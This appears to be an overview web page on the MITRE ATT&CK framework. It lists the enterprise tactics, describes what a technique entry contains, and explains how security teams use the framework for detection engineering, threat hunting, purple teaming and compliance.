MITRE ATT&CK® Framework
A globally accessible knowledge base of adversary tactics, techniques and procedures (TTPs) based on real-world observations. Use it to drive threat-informed defence, detection engineering, and red/blue/purple teaming.
What is MITRE ATT&CK?
MITRE ATT&CK® (Adversarial Tactics, Techniques & Common Knowledge) is a curated repository of adversary behaviour mapped across the attack lifecycle. Each entry documents how attackers operate, which systems they target, and how defenders can detect or mitigate their actions.
- Enterprise Matrix: Windows, macOS, Linux, cloud, network, and container techniques.
- Mobile Matrix: Android & iOS threats.
- ICS Matrix: Industrial control system TTPs.
Enterprise Tactics
Initial Access
See MITRE ATT&CK for associated techniques.
Execution
See MITRE ATT&CK for associated techniques.
Persistence
See MITRE ATT&CK for associated techniques.
Privilege Escalation
See MITRE ATT&CK for associated techniques.
Defence Evasion
See MITRE ATT&CK for associated techniques.
Credential Access
See MITRE ATT&CK for associated techniques.
Discovery
See MITRE ATT&CK for associated techniques.
Lateral Movement
See MITRE ATT&CK for associated techniques.
Collection
See MITRE ATT&CK for associated techniques.
Command and Control
See MITRE ATT&CK for associated techniques.
Exfiltration
See MITRE ATT&CK for associated techniques.
Impact
See MITRE ATT&CK for associated techniques.
Anatomy of a Technique Entry
- Technique ID: e.g., T1059 (Command and Scripting Interpreter).
- Description: What the technique does and why attackers use it.
- Procedure Examples: Real-world references to APT groups or malware.
- Mitigations: Defensive recommendations such as least privilege or application control.
- Detections: Logging sources, analytic ideas, queries (e.g., Sysmon Event ID 1 for process creation).
- Data Sources: Specific telemetry (Process monitoring, WMI events, PowerShell logs, etc.).
Applying ATT&CK in the SOC
Detection Engineering
- Map existing detections to ATT&CK techniques to identify coverage gaps.
- Build detection-as-code correlated to technique IDs (YARA-L, Sigma, Kusto queries).
- Use MITRE ATT&CK Navigator layers to visualise detection maturity.
Threat Hunting & IR
- Investigate alerts by correlating related techniques (parent/child processes, C2 patterns).
- Develop hunt hypotheses aligned to specific tactics (e.g., search for Credential Access behaviour).
- Create playbooks for incident response containing relevant techniques and mitigations.
Red/Purple Teaming
- Plan offensive simulations referencing ATT&CK techniques for realistic tradecraft.
- Measure defensive response per technique to improve detection/response loops.
- Use CALDERA, Atomic Red Team, or Prelude Operator to emulate ATT&CK techniques.
Risk & Compliance
- Map ATT&CK techniques to regulatory controls (NIST 800-53, ISO 27001, CIS v8).
- Report kill-chain coverage to leadership using ATT&CK matrices.
- Prioritise investments based on techniques most used against your sector.
ATT&CK Data Sources
ATT&CK enumerates recommended data sources for each technique. Common examples:
- Process, command-line, and PowerShell logging (Sysmon, Windows Event Logs).
- Authentication logs (Active Directory, Azure AD, Okta).
- Network traffic (NetFlow, Zeek, firewall/proxy logs).
- Cloud logs (AWS CloudTrail, Azure Activity, GCP Audit).
- Application logs (VPN concentrators, SaaS platforms, database audit logs).
- Endpoint telemetry (EDR, memory forensics, registry/file monitoring).
Tools for Working with ATT&CK
- ATT&CK Navigator – Create layers highlighting coverage, gaps, threat intel.
- Center for Threat-Informed Defense projects for automated mappings.
- Atomic Red Team – Small tests mapped to ATT&CK techniques.
- MITRE CALDERA – Automated adversary emulation platform.
- BloodHound – Visualise AD attack paths (maps to ATT&CK techniques).